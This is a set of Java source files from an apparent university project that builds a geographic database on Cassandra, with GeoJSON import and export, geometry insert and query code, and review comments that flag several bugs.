            list_geo.clear();
        }
        catch(NullPointerException e){e.printStackTrace();}
    }
    //Parses a GeoJSON file into geometries and stores them in the bank.
    public static void ImportarGeoJson(String path){
        try {
            List<Geo> retorno =func.GeoJson2Geometry(path);
            func.ImportarBanco(retorno);
            System.out.println(path);
        } catch (IOException | JSONException e) {
            // TODO Auto-generated catch block
            e.printStackTrace();
        }
    }
    //Reads every geometry from the bank and writes them to 'path' as GeoJSON.
    public static void ExportarGeometria(String path){
        try {
            List<Geo> retorno =func.ExportarBanco();
            System.out.println("fim da busca ");
            String resultado=func.Geometry2GeoJson(retorno, path);
            System.out.println("fim da exportação");
        } catch ( ClassNotFoundException | NullPointerException e) {
            // TODO Auto-generated catch block
            e.printStackTrace();
        }
    }
    //Runs the enabled geospatial query: schools within a 10 km radius of a
    //point in central Brasília (the other queries are kept commented out).
    public static void funcoes_geoespaciais(){
        //func.comprimento_total("highway","C:\\Users\\Acer\\Desktop\\testeGeoJson\\teste1.geojson");
        func.localizar_raio(-47.88322,-15.79401, 10000, "school", "C:\\Users\\Acer\\Desktop\\testeGeoJson\\teste2.geojson");
        try{
            //func.porcentagem_area("Universidade de Brasília - Campus Universitário Darcy Ribeiro","C:\\Users\\Acer\\Desktop\\testeGeoJson\\teste3.geojson");
        }catch(Exception f){}
    }
}
<file_sep>/README.md
# BDG_Cassandra
Banco de Dados Geográfico utilizando o banco NoSQL Cassandra.

Monografia com a documentação do projeto: <https://bdm.unb.br/handle/10483/17205>
<file_sep>/BDGCassandra/src/Cassandra/gis/db/BDgeo.java
package Cassandra.gis.db;
import com.datastax.driver.core.Cluster;
import com.datastax.driver.core.Row;
import com.datastax.driver.core.Session;
import com.datastax.driver.core.UDTValue;
import com.esri.core.geometry.Geometry;
import com.esri.core.geometry.Point;
import com.esri.core.geometry.Point2D;
import com.esri.core.geometry.Line;
import com.esri.core.geometry.Polygon;
import com.esri.core.geometry.Polyline;
import com.google.common.reflect.TypeToken;
import com.esri.core.geometry.MultiPoint;
import java.util.ArrayList;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import java.util.Set;
/*
* geometria list< frozen< list< frozen<POINT> >>>
* POINT(x FLOAT, y FLOAT) : tipo definido pelo usuario
* frozen<> : utilizado para tipos definidos pelo usuario
* frozen<POINT> : tipo básico geométrico: deriva linha,LineString, poligono,etc
* frozen< list< frozen<POINT>>> : listas de pontos define uma geometria (1 ou + pontos)
* list< frozen< list< frozen<POINT>>>> : lista de geometrias(estritamente do mesmo tipo):multiponto, multilinha, multipoligono
*
* ponto: [[(x2,y2)]]
* Linha: [[(x1,y1),(x2,y2),(x3,y3)]]
* Poligono: [[(x1,y1),(x2,y2),(x3,y3),(x4,y4),(x5,y5),(x6,y6)]] 4º ponto implicito
*
* multiponto: [[(x1,y1)],[(x2,y2)],[(x3,y3)]]
* multiLinha: [[(x1,y1),(x2,y2),(x3,y3)],[(x4,y4),(x5,y5),(x6,y6)]]
* multiPoligono: [[(x1,y1),(x2,y2),(x3,y3)],[(x4,y4),(x5,y5),(x6,y6)]] 4º ponto implicito
*
*/
public class BDgeo {
//--- connection state ---------------------------------------------------
private Cluster cluster;   // Cassandra cluster handle (DataStax driver)
private Session session;   // session bound to 'keyspace' after a constructor runs
@SuppressWarnings("unused")
private String url="127.0.0.1";      // contact point, kept for reference only
private String keyspace="geometry";  // keyspace hosting both geometry tables
//--- schema DDL executed by the constructors ----------------------------
// Keyspace with simple replication, factor 1 (single-node setup).
private String ks= "CREATE KEYSPACE if not exists "+ keyspace +" WITH REPLICATION = "
        + "{ 'class' : 'SimpleStrategy', 'replication_factor' : 1 };";
// User-defined type holding one coordinate pair.
private String point="CREATE TYPE IF NOT EXISTS "+keyspace+".POINT(x DOUBLE, y DOUBLE);";
//Q1:(LAT-LONG-ID-GEOM-TIPO-PROPRIEDADES)
// Table keyed by position: partition key (longitude,latitude), clustered by name.
private String table1 ="CREATE TABLE IF NOT EXISTS "+keyspace+".geom_latlng"
        +"(latitude DOUBLE,"
        + "longitude DOUBLE,"
        + "nome text,"
        + "geometria_tipo text,"
        + "propriedades map<text,text>,"
        + "geometria list< frozen< list< frozen<POINT> >>>,"//"geometria list< frozen< list< frozen<POINT> >>>,"
        + "PRIMARY KEY((longitude,latitude),nome)) with "
        + "CLUSTERING ORDER BY ( nome ASC); ";
//Q2:(ID-LAT-LONG-GEOM-TIPO-PROPRIEDADES)
// Table keyed by name: partition key nome, clustered by (latitude, longitude).
private String table2 ="CREATE TABLE IF NOT EXISTS "+keyspace+".geom_label"
        +"(latitude DOUBLE,"
        + "longitude DOUBLE,"
        + "nome text,"
        + "geometria_tipo text,"
        + "propriedades map<text,text>,"
        + "geometria list< frozen< list< frozen<POINT> >>>,"
        + "PRIMARY KEY(nome, latitude,longitude)) with "
        + "CLUSTERING ORDER BY (latitude ASC, longitude ASC);";
// Secondary indexes over property values and keys for both tables.
// NOTE(review): "porp_key_*" looks like a typo for "prop_key_*"; the index still
// works under that name — confirm before renaming, existing clusters keep it.
private String idx1="CREATE INDEX if not exists prop_value_1 ON geom_label (propriedades)";
private String idx2="CREATE INDEX if not exists porp_key_1 ON geom_label (KEYS(propriedades))";
private String idx3="CREATE INDEX if not exists prop_value_2 ON geom_latlng (propriedades)";
private String idx4="CREATE INDEX if not exists porp_key_2 ON geom_latlng (KEYS(propriedades))";
//Connects to a single Cassandra contact point and (idempotently) creates the
//keyspace, the POINT UDT, both geometry tables and the property indexes.
//Statement order matters: the keyspace must exist before connect(keyspace).
public BDgeo(String url, String keyspace) {
    this.url=url;
    this.keyspace=keyspace;
    cluster = Cluster.builder().addContactPoint(url).build();
    // Keyspace-less session first, used only to create the keyspace itself.
    session=cluster.newSession();
    session.execute(ks);
    // Re-bind the session to the freshly created keyspace, then build the schema.
    session = cluster.connect(keyspace);
    session.execute(point);
    session.execute(table1);
    session.execute(table2);
    session.execute(idx1);
    session.execute(idx2);
    session.execute(idx3);
    session.execute(idx4);
}
public BDgeo(String[] url, String keyspace) {
this.url=url[0];
this.keyspace=keyspace;
for(int i=0;i<url.length;i++)
cluster = Cluster.builder().addContactPoint(url[i]).build();
session=cluster.newSession();
session.execute(ks);
session = cluster.connect(keyspace);
session.execute(point);
//session.execute(table1);
session.execute(table2);
}
//Inserts every geometry of the list into BOTH tables (geom_latlng and
//geom_label) under the same key (nome, lat, long). All sub-geometries of one
//Geo must share the same type. The input list is consumed on success.
//public void InserirGeo(Geometry geom,String nome,Propriedade<String> propriedades) {
public void InserirGeo(List<Geo> lista_geo) {
    if (lista_geo==null)
        return;
    Geo geo;
    while(!lista_geo.isEmpty()){
        geo=lista_geo.get(0);
        if (geo==null){
            System.out.println("não é possível adicionar geometrias ao banco: "
                    + "geometria nula");
            return;
        }
        if(geo.getGeometria().isEmpty()){
            System.out.println("não é possível adicionar geometrias ao banco: "
                    + "geometria vazia");
            return;
        }
        //build the CQL INSERT (the VALUES part is shared by both tables)
        String table1= "INSERT INTO geom_latlng";
        String table2= "INSERT INTO geom_label";
        String query="(latitude, longitude, nome, geometria_tipo, propriedades, geometria) VALUES ";
        String _tipo="";
        String _geom = "";
        String __=",";          // CQL value separator
        double lat = 0,lon=0;   // representative point used as the row key
        Point p = null;
        Line l= null;
        Polyline pl = null;
        Polygon pg=null;
        Point2D[] pp2d;
        List<Geometry> aux,aux2;
        /*------------------------------------------------------
         * geometria list< frozen< list< frozen<POINT> >>>
         *------------------------------------------------------
         * POINT(x FLOAT, y FLOAT) : user-defined type
         * frozen<> : required for user-defined types
         * frozen<POINT> : basic geometric type: point
         * frozen< list< frozen<POINT>>> : a list of points defines one geometry (1 or more points): line, LineString (polyline(1)), polygon
         * list< frozen< list< frozen<POINT>>>> : a list of geometries (strictly of the same type): multipoint, multiline (polyline(n)), multipolygon
         *
         * === example ===
         * point: [[(x1,y1)],[(x2,y2)],[(x3,y3)]] 3 points
         * LineString: [[(x1,y1),(x2,y2)],(x3,y3)],[(x4,y4),(x5,y5)],(x6,y6)]] 2 curves
         * Polygon: [[(x1,y1),(x2,y2)],(x3,y3)],[(x4,y4),(x5,y5)],(x6,y6)]] 2 polygons, 4th point implicit
         * ===============
         */
        //while(!geo.getGeometria().isEmpty())
        //values(lat, lon, tipo, geometria) — per the note below, for multipoint
        //lat/long should come from the first point
        switch(geo.getGeometria().getType()){
            case MultiPoint:_tipo="'MultiPoint'";
                // NOTE(review): lat/lon are never assigned in this case, so the row
                // key stays (0,0) despite the comment above — confirm.
                //collect every point into its own single-point sub-list
                aux2 = new ArrayList<Geometry>();
                aux=pontos((MultiPoint)geo.getGeometria());
                while(!aux.isEmpty()){
                    aux2.add(aux.get(0));
                    aux.remove(0);
                }
                _geom+="[";
                while(!aux2.isEmpty()){
                    p=(Point)aux2.get(0);
                    _geom+="[("+String.valueOf(p.getX())+__+String.valueOf(p.getY())+")]";
                    aux2.remove(0);
                    if(!aux2.isEmpty())
                        _geom+=__;
                }
                _geom+="]";
                break;
            case Point:_tipo="'Point'";
                p=(Point)geo.getGeometria();
                lon=p.getX();
                lat=p.getY();
                _geom+="[[("+String.valueOf(p.getX())+__+String.valueOf(p.getY())+")]]";
                break;
            case Line: _tipo="'Line'";/* probably obsolete for geojson because of the polyline type */
                l=(Line)geo.getGeometria();
                lon=l.getStartX();
                lat=l.getStartY();
                // NOTE(review): the start point is emitted as (lat,lon) while every
                // other case emits (x,y)=(lon,lat), and the end point reuses
                // getStartY() instead of getEndY() — both look like bugs; confirm.
                _geom+="[[("+String.valueOf(lat)+__+String.valueOf(lon)+"),("+l.getEndX()+__+l.getStartY()+")]]";
                break;
            case Polyline:_tipo="'Polyline'";
                //a polyline may contain more than one path; every path of each
                //polyline is unpacked and appended to the list
                aux2 = new ArrayList<Geometry>();
                int i;
                aux=polilinhas((Polyline)geo.getGeometria());
                while(!aux.isEmpty()){
                    aux2.add(aux.get(0));
                    aux.remove(0);
                }
                pl = (Polyline)aux2.get(0);
                pp2d=pl.getCoordinates2D();
                //row key taken from the first vertex of the first path
                lon=pp2d[0].x;
                lat=pp2d[0].y;
                //for each path, append the corresponding line segments
                _geom+="[";
                while(!aux2.isEmpty()){
                    pl = (Polyline)aux2.get(0);
                    pp2d=pl.getCoordinates2D();
                    if(pp2d.length<2){
                        System.out.println("não é possível adicionar geometria ao banco: "
                                + "geometria POLYLINE corrompida");
                        //return;
                        // NOTE(review): this 'continue' skips aux2.remove(0), so the
                        // same element is reprocessed forever (infinite loop); confirm.
                        continue;
                    }
                    _geom+="[";
                    for(i=0;i<pp2d.length;i++){
                        _geom+="("+String.valueOf(pp2d[i].x)+__+String.valueOf(pp2d[i].y)+")";
                        if(i!=pp2d.length-1) _geom+=__;
                        else _geom+="]";
                    }
                    //a closed path is a polygon, not a polyline
                    if(pp2d[i-1].x==pp2d[0].x && pp2d[i-1].y==pp2d[0].y){
                        System.err.println("não é possível adicionar geometria ao banco: "
                                + "Polilinha é um poligono");
                        //return;
                        // NOTE(review): same skipped-removal problem as above.
                        continue;
                    }
                    aux2.remove(0);
                    if(!aux2.isEmpty())
                        _geom+=__;
                }
                _geom+="]";
                break;
            case Polygon: _tipo="'Polygon'";
                aux2 = new ArrayList<Geometry>();
                aux=poligonos((Polygon)geo.getGeometria());
                while(!aux.isEmpty()){
                    aux2.add(aux.get(0));
                    aux.remove(0);
                }
                pg = (Polygon)aux2.get(0);
                //row key taken from the first vertex of the first ring
                lon=pg.getXY(0).x;
                lat=pg.getXY(0).y;
                _geom+="[";
                while(!aux2.isEmpty()){
                    pg = (Polygon)aux2.get(0);
                    if(pg.getPointCount()<2){
                        System.err.println("não é possível adicionar geometria ao banco: "
                                + "geometria POLYGON corrompida");
                        //return;
                        // NOTE(review): 'continue' without aux2.remove(0) — see above.
                        continue;
                    }
                    _geom+="[";
                    //the first point is not repeated at the end
                    for(i=0;i<pg.getPointCount();i++){
                        _geom+="("+String.valueOf(pg.getXY(i).x)+__+String.valueOf(pg.getXY(i).y)+")";
                        if(i!=pg.getPointCount()-1) _geom+=__;
                        else _geom+="]";
                    }
                    aux2.remove(0);
                    if(!aux2.isEmpty())
                        _geom+=__;
                }
                _geom+="]";
                //the first point is not repeated at the end;
                //a closing edge between the last and the first point is assumed
                break;
            default:
                System.err.println("não é possível adicionar geometria ao banco: "
                        + "geometria com tipo indefinido");
                //return;
                // NOTE(review): this 'continue' skips lista_geo.remove(0) below, so
                // an unknown geometry type loops forever on the same element; confirm.
                continue;
        }
        //-----------------------------------------------------------
        //finish the statement: key columns (single quotes escaped for CQL)
        if(geo.getId().contains("'")){
            geo.setId(geo.getId().replaceAll("'", "''"));
        }
        query+="("+String.valueOf(lat)+__+String.valueOf(lon)+__+"'"+geo.getId()+"'"+__+_tipo+__+"{";
        //properties map (the Propriedade container is drained here)
        while(!geo.getPropriedades().vazio()){
            String propp=geo.getPropriedades().getP();
            String propv=geo.getPropriedades().getV();
            if(propp.contains("'")||propv.contains("'")){
                propp=propp.replaceAll("'", "''");
                propv=propv.replaceAll("'", "''");
            }
            query+="'"+propp+"':'"+propv+"'";
            geo.getPropriedades().remove();
            if(!geo.getPropriedades().vazio()) query+=__;
        }
        //end of statement
        query+="}"+__+_geom+");";
        //execute the same row against both tables
        //try{
        //System.out.println("insert into tables ->"+query);
        session.execute(table1+query);
        session.execute(table2+query);
        //Thread.sleep(500);
        //}catch(Exception e){ System.err.println(e.getMessage());}
        //geo.setLatitude(lat);
        //geo.setLongitude(lon);
        lista_geo.remove(0);
    }
}
//busca a geometria com chave primaria 'nome'
/*public Geo BuscarGeo(String nome) throws ClassNotFoundException{
// for (Row row : session.execute("SELECT * FROM table1"))
//nome="minha quadra";
List<Row> linha = session.execute("SELECT* from geom_label WHERE id='"+nome+"';").all();//latitude, longitude, nome, geometria, geometria_tipo, propriedades FROM geom_label "
if(linha.size()!=1){
System.out.println("nenhuma ou mais de uma geometria no banco para essa consulta");
return null;
}
//-----------------------------------------------
Geo geo= new Geo();
geo.setLatitude(linha.get(0).getDouble(1));
geo.setLongitude(linha.get(0).getDouble(2));
geo.setId(linha.get(0).getString(0));
geo.setTipo(linha.get(0).getString(4));
//---
Propriedade<String> propriedades =new Propriedade<String> ();
Map<?, ?> map = linha.get(0).getMap(5,Class.forName("java.lang.String"),Class.forName("java.lang.String"));
Set<?> set = map.keySet();
Iterator<?> setIterator = set.iterator();
while(setIterator.hasNext()){
Object key = setIterator.next();
propriedades.put(key.toString(), map.get(key).toString());
}
//---
int cont;
List<UDTValue> registro_primario=null;
List<List<UDTValue>> registro=linha.get(0).getList(3, new TypeToken<List<UDTValue>>(){
private static final long serialVersionUID = 1L;});
switch(geo.getTipo()){
case "Point":
for(int x=0;x< registro.size();x++){
registro_primario=registro.get(x);
if(registro_primario.size()!=1){
System.err.println("diferente de um ponto para a geometria 'Ponto'");
linha.remove(0);
continue;
}
//
geo.setGeometria(new Point(registro_primario.get(0).getDouble(0),registro_primario.get(0).getDouble(1)));
//
registro_primario.remove(0);
}
//acredito que todos os objetos foram removidos dentro do for(){while(){}}
registro.clear();*
break;
case "MultiPoint":
MultiPoint mp= new MultiPoint();
for(int x=0;x< registro.size();x++){
registro_primario=registro.get(x);
if(registro_primario.size()!=1){
System.err.println("diferente de um ponto para a geometria 'Ponto'");
linha.remove(0);
continue;
}
//
while(!registro_primario.isEmpty()){
mp.add(new Point(registro_primario.get(0).getDouble(0),registro_primario.get(0).getDouble(1)));
registro_primario.remove(0);
}
geo.setGeometria(mp);
//
}
break;
case "Line":// acho que para geojson esse tipo eh obsoleto por causa da polilinha
Line l= new Line();
registro_primario=registro.get(0);
if(registro_primario.size()!=2){
System.err.println("diferente de dois ponto para a geometria 'Linha'");
linha.remove(0);
return null;
}
for(cont=0;cont<registro_primario.size();cont++){
//
if(cont==0)
l.setStart(new Point(registro_primario.get(0).getDouble(0),registro_primario.get(0).getDouble(1)));
else
l.setEnd(new Point(registro_primario.get(0).getDouble(0),registro_primario.get(0).getDouble(1)));
registro_primario.remove(cont);
}
geo.setGeometria(l);
break;
case "Polyline":
Polyline pl= new Polyline();
for(int geometrias=0;geometrias< registro.size();geometrias++){
registro_primario=registro.get(geometrias);
if(registro_primario.size()<2){
System.err.println("diferente de dois ponto para a geometria 'Linha'");
linha.remove(0);
continue;
}
//para cada caminho pegar as linhas
for(cont=0;cont<registro_primario.size();cont++){
//
if(cont==0)
pl.startPath(new Point(registro_primario.get(cont).getDouble(0),registro_primario.get(cont).getDouble(1)));
else
pl.lineTo(new Point(registro_primario.get(cont).getDouble(0),registro_primario.get(cont).getDouble(1)));
}
for(cont=0;cont<registro_primario.size();){
registro_primario.remove(0);
}
}
geo.setGeometria(pl);
break;
case "Polygon":
Polygon pg= new Polygon();
for(int geometrias=0;geometrias< registro.size();geometrias++){
registro_primario=registro.get(geometrias);
if(registro_primario.size()<3){
System.err.println("menos de dois ponto para a geometria 'Poligono'");
linha.remove(0);
return null;
}
//para cada caminho pegar as linhas
for(cont=0;cont<registro_primario.size();cont++){
//
if(cont==0)
pg.startPath(new Point(registro_primario.get(cont).getDouble(0),registro_primario.get(cont).getDouble(1)));
else
pg.lineTo(new Point(registro_primario.get(cont).getDouble(0),registro_primario.get(cont).getDouble(1)));
}
for(cont=0;cont<registro_primario.size();){
registro_primario.remove(0);
}
}
geo.setGeometria(pg);
break;
default:
System.err.println("geometria nao definida, será ignorada");
linha.remove(0);
return null;
}
geo.setPropriedades(propriedades);
linha.remove(0);
return geo;
}*/
/**
 * Fetches rows from Cassandra and rebuilds each one as a {@link Geo} object.
 *
 * The {@code select} code picks both the table and the filter:
 *   0: all rows of geom_label
 *   1: geom_label filtered by nome
 *   2: geom_label where the propriedades map contains the key {@code nome}
 *   3: geom_label where the propriedades map contains the value {@code nome}
 *   4: all rows of geom_latlng
 *   5: geom_latlng rows at latitude=0.0 and longitude=0.0
 *   6: geom_latlng where the propriedades map contains the key {@code nome}
 *   7: geom_latlng where the propriedades map contains the value {@code nome}
 * Any other code yields an empty result list.
 *
 * NOTE(review): {@code nome} is concatenated straight into the CQL text, so a
 * value containing a single quote breaks the statement (CQL injection);
 * prepared statements would avoid this.
 *
 * @param select query selector code (see table above)
 * @param nome   name/key/value used by selectors 1-3 and 6-7; ignored otherwise
 * @return list of reconstructed geometries (possibly empty)
 * @throws ClassNotFoundException if java.lang.String cannot be resolved (should not happen)
 * @throws NullPointerException   on unexpectedly null row data
 */
public List<Geo> BuscarGeo(int select,String nome) throws ClassNotFoundException, NullPointerException{
    List<Row> linha = null;
    // Choose the CQL statement according to the selector code.
    switch(select){
    case 0: linha= session.execute("SELECT * from geom_label;").all();
    break;
    case 1: linha = session.execute("SELECT * from geom_label WHERE nome='"+nome+"';").all();
    break;
    case 2: linha = session.execute("SELECT * from geom_label WHERE propriedades contains key '"+nome+"';").all();
    break;
    case 3: linha = session.execute("SELECT * from geom_label WHERE propriedades contains '"+nome+"';").all();
    break;
    case 4: linha= session.execute("SELECT * from geom_latlng;").all();
    break;
    case 5: linha = session.execute("SELECT * from geom_latlng WHERE latitude=0.0 and longitude=0.0;").all();
    break;
    case 6: linha = session.execute("SELECT * from geom_latlng WHERE propriedades contains key '"+nome+"';").all();
    break;
    case 7: linha = session.execute("SELECT * from geom_latlng WHERE propriedades contains '"+nome+"';").all();
    break;
    default: linha= new ArrayList<Row>();break;
    }
    List<Geo> lista= new ArrayList<Geo>();
    // Consume rows front-to-back; each iteration removes linha.get(0) when done.
    while( !linha.isEmpty()){
        Geo geo= new Geo();
        // Column order differs between the two tables.
        if(select>3){// geom_latlng table: (latitude, longitude, id, ...)
            geo.setLatitude(linha.get(0).getDouble(0));
            geo.setLongitude(linha.get(0).getDouble(1));
            geo.setId(linha.get(0).getString(2));
        }
        else{// geom_label table: (id, latitude, longitude, ...)
            geo.setId(linha.get(0).getString(0));
            geo.setLatitude(linha.get(0).getDouble(1));
            geo.setLongitude(linha.get(0).getDouble(2));
        }
        // Column 4 holds the geometry type name ("Point", "Polygon", ...).
        geo.setTipo(linha.get(0).getString(4));
        // Column 5 is a map<text,text> of free-form properties; copy it out.
        Propriedade<String> propriedades =new Propriedade<String> ();
        Map<?, ?> map = linha.get(0).getMap(5,Class.forName("java.lang.String"),Class.forName("java.lang.String"));
        Set<?> set = map.keySet();
        Iterator<?> setIterator = set.iterator();
        while(setIterator.hasNext()){
            Object key = setIterator.next();
            propriedades.put(key.toString(), map.get(key).toString());
        }
        // Column 3 holds the vertex data: a list of paths, each a list of UDT points.
        int cont;
        List<UDTValue> registro_primario=null;
        List<List<UDTValue>> registro=linha.get(0).getList(3, new TypeToken<List<UDTValue>>(){
            private static final long serialVersionUID = 1L;});
        // Rebuild the esri geometry matching the stored type name.
        switch(geo.getTipo()){
        case "Point":
            for(int x=0;x< registro.size();x++){
                registro_primario=registro.get(x);
                if(registro_primario.size()!=1){
                    // NOTE(review): this `continue` advances the inner for-loop,
                    // but linha.remove(0) has already dropped the current row —
                    // confirm the intended skip semantics.
                    System.err.println("diferente de um ponto para a geometria 'Ponto'");
                    linha.remove(0);
                    continue;
                }
                geo.setGeometria(new Point(registro_primario.get(0).getDouble(0),registro_primario.get(0).getDouble(1)));
                registro_primario.remove(0);
            }
            /* assumption in original: all objects were already removed inside
               the for/while loops, so registro.clear() is unnecessary. */
            break;
        case "MultiPoint":
            MultiPoint mp= new MultiPoint();
            for(int x=0;x< registro.size();x++){
                registro_primario=registro.get(x);
                if(registro_primario.size()!=1){
                    System.err.println("diferente de um ponto para a geometria 'Ponto'");
                    linha.remove(0);
                    continue;
                }
                // Drain every point of this path into the MultiPoint.
                while(!registro_primario.isEmpty()){
                    mp.add(new Point(registro_primario.get(0).getDouble(0),registro_primario.get(0).getDouble(1)));
                    registro_primario.remove(0);
                }
                geo.setGeometria(mp);
            }
            break;
        case "Line":/* probably obsolete for GeoJSON because of Polyline */
            Line l= new Line();
            registro_primario=registro.get(0);
            if(registro_primario.size()!=2){
                System.err.println("diferente de dois ponto para a geometria 'Linha'");
                linha.remove(0);
                continue;
            }
            // NOTE(review): remove(cont) shrinks the list while cont advances,
            // so the loop exits after one pass and setEnd() is never reached —
            // confirm whether Line rows ever occur in practice.
            for(cont=0;cont<registro_primario.size();cont++){
                if(cont==0)
                    l.setStart(new Point(registro_primario.get(0).getDouble(0),registro_primario.get(0).getDouble(1)));
                else
                    l.setEnd(new Point(registro_primario.get(0).getDouble(0),registro_primario.get(0).getDouble(1)));
                registro_primario.remove(cont);
            }
            geo.setGeometria(l);
            break;
        case "Polyline":
            Polyline pl= new Polyline();
            for(int geometrias=0;geometrias< registro.size();geometrias++){
                registro_primario=registro.get(geometrias);
                if(registro_primario.size()<2){
                    System.err.println("diferente de dois ponto para a geometria 'Linha'");
                    linha.remove(0);
                    continue;
                }
                // First vertex starts the path, the rest extend it.
                for(cont=0;cont<registro_primario.size();cont++){
                    if(cont==0)
                        pl.startPath(new Point(registro_primario.get(cont).getDouble(0),registro_primario.get(cont).getDouble(1)));
                    else
                        pl.lineTo(new Point(registro_primario.get(cont).getDouble(0),registro_primario.get(cont).getDouble(1)));
                }
                // Drain the consumed path.
                for(cont=0;cont<registro_primario.size();){
                    registro_primario.remove(0);
                }
            }
            geo.setGeometria(pl);
            break;
        case "Polygon":
            Polygon pg= new Polygon();
            for(int geometrias=0;geometrias< registro.size();geometrias++){
                registro_primario=registro.get(geometrias);
                if(registro_primario.size()<3){
                    // NOTE(review): unlike the other cases, a malformed polygon
                    // aborts the whole scan with null — confirm this is intended.
                    System.err.println("menos de dois ponto para a geometria 'Poligono'");
                    linha.remove(0);
                    return null;
                }
                // First vertex starts the ring, the rest extend it.
                for(cont=0;cont<registro_primario.size();cont++){
                    if(cont==0)
                        pg.startPath(new Point(registro_primario.get(cont).getDouble(0),registro_primario.get(cont).getDouble(1)));
                    else
                        pg.lineTo(new Point(registro_primario.get(cont).getDouble(0),registro_primario.get(cont).getDouble(1)));
                }
                // Drain the consumed ring.
                for(cont=0;cont<registro_primario.size();){
                    registro_primario.remove(0);
                }
            }
            geo.setGeometria(pg);
            break;
        default:
            // Unknown geometry type: drop the row and move on.
            System.err.println("geometria nao definida, será ignorada");
            linha.remove(0);
            continue;
        }
        geo.setPropriedades(propriedades);
        linha.remove(0);
        lista.add(geo);
    }
    return lista;
}
/**
 * Splits a multi-ring Polygon into a list of single-ring Polygons.
 * A polygon that already has exactly one path is returned as-is (same object).
 *
 * @param polygon geometry to split; on null prints an error and returns null
 * @return list with one Polygon per path, or null for null input
 */
private List<Geometry> poligonos(Polygon polygon) {
    if (polygon == null) {
        System.err.println("poligono nula...");
        return null;
    }
    List<Geometry> partes = new ArrayList<Geometry>();
    if (polygon.getPathCount() == 1) {
        partes.add(polygon);
        return partes;
    }
    for (int caminho = 0; caminho < polygon.getPathCount(); caminho++) {
        Polygon parte = new Polygon();
        Point vertice = new Point();
        int primeiro = polygon.getPathStart(caminho);
        // Copy every vertex of this ring into a fresh single-ring polygon.
        for (int idx = primeiro; idx < polygon.getPathEnd(caminho); idx++) {
            polygon.getPoint(idx, vertice);
            if (idx == primeiro)
                parte.startPath(vertice);
            else
                parte.lineTo(vertice);
        }
        partes.add(parte);
    }
    return partes;
}
/**
 * Splits a multi-path Polyline into a list of single-path Polylines.
 * A polyline that already has exactly one path is returned as-is (same object).
 *
 * @param polyline geometry to split; on null prints an error and returns null
 * @return list with one Polyline per path, or null for null input
 */
private List<Geometry> polilinhas(Polyline polyline) {
    if (polyline == null) {
        System.err.println("polylinha nula...");
        return null;
    }
    List<Geometry> partes = new ArrayList<Geometry>();
    if (polyline.getPathCount() == 1) {
        partes.add(polyline);
        return partes;
    }
    for (int caminho = 0; caminho < polyline.getPathCount(); caminho++) {
        Polyline parte = new Polyline();
        Point vertice = new Point();
        int primeiro = polyline.getPathStart(caminho);
        // Copy every vertex of this path into a fresh single-path polyline.
        for (int idx = primeiro; idx < polyline.getPathEnd(caminho); idx++) {
            polyline.getPoint(idx, vertice);
            if (idx == primeiro)
                parte.startPath(vertice);
            else
                parte.lineTo(vertice);
        }
        partes.add(parte);
    }
    return partes;
}
/**
 * Flattens a MultiPoint into a list of individual Points and empties the
 * source geometry afterwards.
 *
 * @param multipoints source geometry; cleared (setEmpty) before returning
 * @return one Point per vertex of the input
 */
private List<Geometry> pontos(MultiPoint multipoints) {
    List<Geometry> resultado = new ArrayList<Geometry>();
    int total = multipoints.getPointCount();
    for (int indice = 0; indice < total; indice++) {
        resultado.add(multipoints.getPoint(indice));
    }
    multipoints.setEmpty();
    return resultado;
}
/**
 * Wipes and re-provisions the geometry schema: reconnects the session, drops
 * both tables if present, then recreates them with their secondary indexes.
 */
public void LimparBanco(){
    session = cluster.newSession();
    session = cluster.connect(keyspace);
    // Statements run in this exact order: drops first, then DDL, then indexes.
    String[] comandos = {
        "drop table if exists geom_label;",
        "drop table if exists geom_latlng;",
        table1,
        table2,
        idx1,
        idx2,
        idx3,
        idx4
    };
    for (String cql : comandos) {
        session.execute(cql);
    }
}
}
<file_sep>/BDGCassandra/src/Cassandra/servico/consultaopiniao/BD.java
/*
CREATE KEYSPACE ConsultaOpiniao WITH replication = {'class':'SimpleStrategy', 'replication_factor':1};
USE ConsultaOpiniao;
// Q1:
CREATE TABLE estabelecimento (id UUID, estabelecimento_nome TEXT, estabelecimento_descricao TEXT, avaliacao DOUBLE, latitude DOUBLE, longitude DOUBLE, PRIMARY KEY (id));
SELECT estabelecimento_nome, latitude, longitude, tipo_estabelecimento_descricao FROM estabelecimento WHERE id=?;
// Q2:
CREATE TABLE usuario (cpf TEXT, senha TEXT, usuario_nome TEXT, email TEXT, PRIMARY KEY (cpf));
SELECT usuario_nome, senha, email FROM usuario WHERE cpf=?;
// Q3:
CREATE TABLE avaliacao (id UUID, estabelecimento_nome TEXT, estabelecimento_descricao TEXT, avaliacao MAP<TEXT,DOUBLE>, PRIMARY KEY (id,estabelecimento_nome)) WITH CLUSTERING ORDER BY (estabelecimento_nome ASC);
SELECT estabelecimento_nome, tipo_estabelecimento_descricao, usuario_nome FROM avaliacao WHERE id=?;
// Q4:
CREATE TABLE table2 (id UUID, tipo INT, estabelecimento_nome TEXT, avaliacao LIST<TEXT>, PRIMARY KEY (id,tipo)) WITH CLUSTERING ORDER BY (tipo ASC);
SELECT tipo, estabelecimento_nome FROM table2 WHERE id=?;
*/
package Cassandra.servico.consultaopiniao;
import Cassandra.gis.db.Tupla;
import com.datastax.driver.core.Cluster;
import com.datastax.driver.core.ResultSet;
import com.datastax.driver.core.Row;
import com.datastax.driver.core.Session;
import com.datastax.driver.core.TupleValue;
import com.google.common.reflect.TypeToken;
import java.util.ArrayList;
import java.util.List;
import java.util.UUID;
/**
 * Data-access layer for the "consulta_opiniao" (opinion survey) keyspace.
 *
 * The constructor provisions the keyspace, four query-driven tables
 * (estabelecimento, usuario, avaliacao, tipoAvaliacao) and their SASI
 * secondary indexes; all DDL is idempotent ("if not exists").
 *
 * NOTE(review): every statement is built by string concatenation, so any
 * input containing a single quote breaks the CQL (injection risk); prepared
 * statements would fix this.
 */
public class BD {
    private Cluster cluster;
    private Session session;
    // Cassandra contact point and target keyspace.
    private String url="127.0.0.1";
    private String keyspace="consulta_opiniao";
    //private String keyspace="geom";

    /**
     * Connects to Cassandra at {@code url} and creates the keyspace, tables
     * and indexes. Each table answers one of the application queries Q1-Q4
     * documented below.
     */
    public BD() {
        String ks= "CREATE KEYSPACE if not exists "+ keyspace
                +" WITH REPLICATION = "
                + "{ 'class' : 'SimpleStrategy', 'replication_factor' : 1 };";
        // Q1: Which establishments are available for review? Where are they? What type?
        String q1="CREATE TABLE if not exists estabelecimento "
                + "(estabelecimento_id UUID,"
                + "estabelecimento_nome TEXT,"
